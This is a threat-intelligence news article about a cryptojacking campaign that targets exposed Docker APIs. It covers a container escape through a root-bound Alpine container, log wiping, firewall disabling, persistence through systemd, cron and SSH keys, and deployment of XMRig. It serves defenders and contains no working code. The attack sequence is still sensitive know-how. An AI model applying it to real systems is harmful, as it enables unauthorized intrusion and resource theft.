Misconfigured Ports Continue to Plague Docker Instances, Enabling Container Host Escapes via Bind

Misconfigurations in the cloud continue to lead to the compromise of insecure assets. Datadog security researcher Matt Muir provides insights into a new cryptojacking campaign attributed to threat actors associated with Spinning YARN—a campaign previously reported by Muir at Cado Security. This campaign, along with others like Commando Cat, have seen attackers target exposed Docker instances, escaping containers by binding to their hosts. These findings reinforce the necessity of securing cloud assets and detail the attackers' strategy of post-exploitation from Docker to the host container. The ultimate goal is to persist and deploy the XMRig cryptocurrency miner. Initiated by scanning for hosts with Docker’s default port (2375) exposed, Muir outlines an attack sequence that includes deploying an Alpine container bound to the host’s root directory, payload deployment using shell scripts, and establishing persistence mechanisms. By exploiting this access, attackers effectively escalate their privileges and execute arbitrary code, illustrating the campaign's potential impact on affected systems.

The attack sequence begins by identifying vulnerable Docker hosts. Once confirmed that the host's Docker API is accessible, the attackers deploy an Alpine Linux container, configuring it to bind the host’s root directory to a directory within the container using the chroot shell utility. This access allows direct manipulation of the host’s filesystem. Within this containerized environment, the attackers execute a shell script that establishes persistent backdoors and facilitates further malicious activities, including modifying crontab entries to repeatedly execute malicious commands and download additional payloads, ensuring the persistence of the attack. A key static indicator for a downloader utility was identified, with the string 'zzhbot' for the user-agent.

Subsequently, the attack differentiates based on user permissions—`ai.sh` for regular users or `ar.sh` for root. At the time of analysis, Muir observed that the `ai.sh` payload was no longer available, "making it likely that the attacker assumes the user will indeed be root." The `ar.sh` script performs a range of disruptive actions: it disables the host’s firewall with systemctl commands, tampers with system logging by cleaning logs such as auth.log and boot.log, removes monitoring agents, and disables shell history by modifying the HISTCONTROL setting. A malicious binary named 'chkstart' is dropped and executed, which serves as a multifunctional tool facilitating remote access, payload execution, and additional malware downloads. This binary also ensures it has not already infected the host to avoid a redundant infection process.

Finally, 'chkstart' cements the attackers' foothold by establishing persistent backdoor access through systemd modifications, altering service files to execute malicious binaries every time the service runs, and ensuring malware persistence across reboots. The compromised systems are then prepped for lateral attack spread within the network. SSH configuration is tampered with as `chkstart` adds an attacker-controlled SSH key to the `/root/.ssh/authorized_keys` and `/root/.ssh/.ssh/zzhkeys` directories. Once persistence mechanisms are in place, the XMRig coinminer is deployed for resource hijacking. Additionally, another notable malware payload, "exeremo," also written in Go, was examined to facilitate lateral movement, using a series of commands to query bash_history and configuration files to identify usernames, hosts, SSH keys, and SSH commands, enabling attackers to pivot to other systems.

Notably, `sd/httpd` and `fkoths` are additional tools used for scanning and anti-forensics. The fkoths tool impacts not only defenders but also other adversaries. It rewrites the Docker registry's hostname in /etc/hosts with an IP address, effectively blackholing it. This prevents other attackers from downloading their images or tools onto the system.